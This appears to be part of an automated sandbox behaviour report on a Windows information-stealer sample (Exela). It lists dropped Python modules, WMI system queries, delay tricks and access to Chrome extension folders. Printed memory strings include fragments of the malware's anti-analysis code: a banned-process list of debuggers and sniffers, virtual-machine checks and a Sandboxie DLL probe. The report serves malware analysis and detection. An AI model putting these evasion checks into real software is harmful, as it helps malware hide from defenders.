            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "OLLYDBG.EXE"
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "FIDDLER.EXE"
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: XENSERVICE.EXE
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "VMUSRVC.EXE"P
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: WIRESHARK.EXE
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: HANDLE = CTYPES.WINDLL.LOADLIBRARY("SBIEDLL.DLL")
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4603
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 919
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\unicodedata.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_cffi_backend.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_uuid.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\select.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_asyncio.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\multidict\_multidict.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\python311.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_decimal.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_http_writer.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_socket.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_bz2.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_ctypes.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_helpers.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_queue.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_multiprocessing.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_lzma.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_http_parser.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_cffi_backend.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\frozenlist\_frozenlist.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_socket.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_ctypes.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_bz2.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\select.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\python3.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\yarl\_quoting_c.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_http_parser.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\python311.dllJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_sqlite3.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_websocket.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_helpers.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\frozenlist\_frozenlist.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\yarl\_quoting_c.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\python3.dllJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_queue.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_overlapped.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_decimal.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_ssl.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_uuid.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_lzma.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\_asyncio.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\aiohttp\_websocket.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\unicodedata.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_hashlib.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\aiohttp\_http_writer.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI80682\cryptography\hazmat\bindings\_rust.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\pyexpat.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\multidict\_multidict.cp311-win_amd64.pydJump to dropped file
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI67602\_ssl.pydJump to dropped file
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_81-17199
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17183
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7364Thread sleep count: 4603 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7372Thread sleep count: 919 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7532Thread sleep time: -3689348814741908s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7492Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\System32\svchost.exe TID: 7624Thread sleep time: -30000s >= -30000s
            Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Manufacturer FROM Win32_ComputerSystem
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Manufacturer FROM Win32_ComputerSystem
            Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\systeminfo.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA8842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF72AA8842C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA78AF0 FindFirstFileExW,FindClose,0_2_00007FF72AA78AF0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA924C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF72AA924C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeCode function: 0_2_00007FF72AA8842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,0_2_00007FF72AA8842C
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,81_2_00007FF6E3A7842C
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A68AF0 FindFirstFileExW,FindClose,81_2_00007FF6E3A68AF0
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A824C4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,81_2_00007FF6E3A824C4
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeCode function: 81_2_00007FF6E3A7842C _invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_invalid_parameter_noinfo,FindNextFileW,GetLastError,81_2_00007FF6E3A7842C
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\imagesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_localesJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\cssJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\htmlJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bgJump to behavior
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmwareuser.exe"
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmwaretray.exe", # VMware
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmusrvc.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vmusrvc.exe"P
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vboxservice.exe", # VirtualBox
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: *Hyper-V Administrators
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: self.banned_process = ["HTTP Toolkit.exe", "httpdebuggerui.exe","wireshark.exe", "fiddler.exe", "regedit.exe", "taskmgr.exe", "vboxservice.exe", "df5serv.exe", "processhacker.exe", "vboxtray.exe", "vmtoolsd.exe", "vmwaretray.exe", "ida64.exe", "ollydbg.exe",
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: qemu-ga.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, sc.exe, 0000004E.00000002.1790234355.000002674931A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Heartbeat Service
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: elif b"vmware" in stdout2.lower():
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: b'VMware'*
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1666815528.000002DCCF02C000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969808694.000002DCCF02E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969112805.000002DCCEF3A000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1965276250.000002DCCEF35000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1972389276.000002DCCF030000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1969639585.000002DCCEF69000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1988347841.000002DCCF030000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1670341282.000002DCCEF78000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmsrvc.exe", # VirtualBox
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Volume Shadow Copy Requestor
            Source: ROUTE.EXE, 0000004B.00000002.1787944348.000001F836B19000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll*
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971539043.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1965135302.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990080929.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V Time Synchronization Service
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmtoolsd.exepC
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: "vboxtray.exe"
            Source: svchost.exe, 0000003B.00000002.2894048217.000001B772640000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWHp
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: b"vmware"
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vboxservice.exe0E
            Source: net1.exe, 00000041.00000002.1769944315.00000281E77F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Administrators
            Source: ARP.EXE, 0000004C.00000002.1788850433.000001A5F0C27000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllAA
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmwareuser.exe
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1955400520.000002DCD1507000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmusrvc.ex
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: vmware
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vmtoolsd.exe", # VMware
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1971539043.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1965135302.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.1990080929.000002DCCF6A4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1970902588.000002DCD179E000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1957627500.000002DCD179E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: DISPLAY_NAME: Hyper-V PowerShell Direct Service
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: return any(x.lower() in decoded_output[2].strip().lower() for x in ("virtualbox", "vmware"))
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1735254245.000002DCD0DF6000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961094349.000002DCD14C1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1959010647.000002DCD0DB4000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000003.1961262415.000002DCD0E25000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "vboxtray.exe", # VirtualBox
            Source: SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, 00000001.00000002.2003130467.000002DCD2BF0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: VMware0*
